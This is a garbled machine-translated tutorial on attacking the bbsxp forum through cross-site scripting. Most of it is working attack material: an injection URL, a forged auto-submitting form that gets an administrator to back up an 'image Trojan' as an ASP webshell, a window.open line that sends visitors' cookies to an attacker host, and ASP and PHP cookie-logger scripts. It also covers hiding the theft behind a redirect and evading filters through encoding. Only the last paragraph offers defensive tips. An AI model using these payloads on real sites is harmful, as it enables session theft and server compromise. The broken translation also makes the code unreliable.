Cross-site scripting and Prevention

The so-called Cross-Site Vulnerabilities What about it? In fact, this is a hot topic SQL Injection The principle is similar because Program When writing a program, the user does not fully filter some variables, or directly sends the data submitted by the user to the SQL statement for execution without any filtering, as a result, some specially constructed statements submitted by the user generally contain scripts such as JavaScript. Code In this way, the so-called cross-site attack is formed once the service is executed. Generally, programs with relatively high human-computer interactions, such as forums and message boards, are prone to cross-site scripting attacks.

How can we determine whether a program has a Cross-Site vulnerability? The analysis program is the most direct method, such as the recently popular cross-site bbsxp5.15

Vulnerabilities, because Prawns have already been described in detail, and I will not discuss them in detail. Simply put, there is such a sentence in the cookies. asp file.

Response. Cookies ("skins") = "" & request ("no") & "" And then in setup. asp

Response. Write "<HTML> <Link href = images/skins/"& request. Cookies (" skins ") &"/bbs.css rel = stylesheet> <SCRIPT src = inc/bbsxp. js> </SCRIPT>
<SCRIPT src = inc/ybb. JS> </SCRIPT> <SCRIPT src = images/skins/"& request. cookies ("skins") & "/BBS. JS> </SCRIPT>"

We can see that we only need to construct the NO of the qualified skin, and then add our <SCRIPT Script script to the end after "<" in front of the closure.

For example: http://xxx.xxxx.xxx/cookies.asp? Menu = skins & NO = 4> <SCRIPT> document. write ('<IFRAME marginwidth = 100 marginheight = 100 src = "http://www.baidu.com" frameborder = 100 width = 0 scrolling = noheight = 0to... gin = "0"> </iframe> '); </SCRIPT> <SCRIPT>

In this way, the submission can achieve our cross-site goal (this is already demonstrated in my animation)

With a deeper exploitation, we can construct a form to confuse the Administrator with clicking our post or joining. For example, we construct

Http: // 127.0.0.1/bbsxp/page2.asp? Username = <body onload = "javascript: Document. Forms [0]. Submit ()">

<Form action = "http: // 127.0.0.1/bbsxp/admin_fso.asp? Menu = bakbf "method =" Post ">
<Input value = "/uploadfile/2005-5/200512365. jpg" name = "yl">
<Input value = "database/Haha. asp" name = "BF">
</Body> /Uploadfile/2005-5/200512365. jpg
This is your asp image Trojan

In this way, if the administrator browses our message, the script will automatically put/uploadfile/2005-5/200512365. jpg

Back up data to database/Haha. asp. We have a cute webshell. Why is administrator browsing valid? Because cookies and sessions exist on the server.

Session stores some variables for each user in a file under the tmp directory on the server side. Session operations are actually file read/write operations.

Each user has its own session. Their life cycle is generally when a user opens a website browser to close the connection with the next website

Some browsers end. Cookies are stored on the user end. They need to enable cookie support. Therefore, only management can back up JPG files in ASP.

What is common for everyone nowadays is to steal cookies and then cheat, or use social engineering for further intrusion. For example, we can construct the following script code to steal user cookies.

Javascript: window. Open ('HTTP: // XXX. XXX. XXX/cookies. asp? MSG = '+ document. Cookie) Where http://xxx.xxx.xxx/is the space of the website, and cookies.aspis an ASP script for collection

 

The parameter followed by MSG, And we specify the document. Cookie parameter, that is, the cookie used to access the user.

The cookie. ASP code is:
<%

Testfile = server. mappath ("hun.txt ")

MSG = request ("MSG ")

Set FS = server. Createobject ("scripting. FileSystemObject ")

Set thisfile = FS. opentextfile (testfile, 8, true, 0)

Thisfile. writeline ("" & MSG &"")

Thisfile. Close

Set FS = nothing

%>

Cookieers of all such readers will be collected in the hun.txt file.

However, when visitors access our posts, they will also access our website. Isn't this just a cover? Haha, but we only need to handle it a little bit.

This can be done relatively practically, for example, we add the following code

<Script language = VBScript>
Window. Location. href = "http://xxx.xxx.xxx"
</SCRIPT>

This XXX. XXX. XXX should be replaced with the domain name of the website you attacked. The purpose of this operation is to open the website while visiting our specially crafted website.

My website, huh, will this be more concealed?

This cookie. asp is the same as the cookie. php with the same function. The Code is as follows:
<? PHP
$ Info = getenv ("QUERY_STRING ");
If ($ info ){
$ Fp = fopen ("cookies.txt", "");
Fwrite ($ FP, $ info. "\ n ");
Fclose ($ FP );
}
?>

However, most of the good forums have filtered out JavaScript characters. But there are still ways to use it,

Javascript can be written as ASCII code in the post posted on the Forum. For example, J can be written as "J"

The defense method is to filter characters like JavaScript/<SCRIPT>/'/;/&/# and so on,

Of course, the premise is that your webpage will be displayed normally. We recommend that you do not easily open unknown URLs. You should set different passwords for your mailbox, forum, QQ, and other materials,

If the information or password is stolen, the chain reaction is avoided, and all the information and password are obtained by others. This requires profound and profound social engineering.

To sum up. The Cross-Site skills are very strong. If you have accumulated more experience, you will get twice the result with half the effort.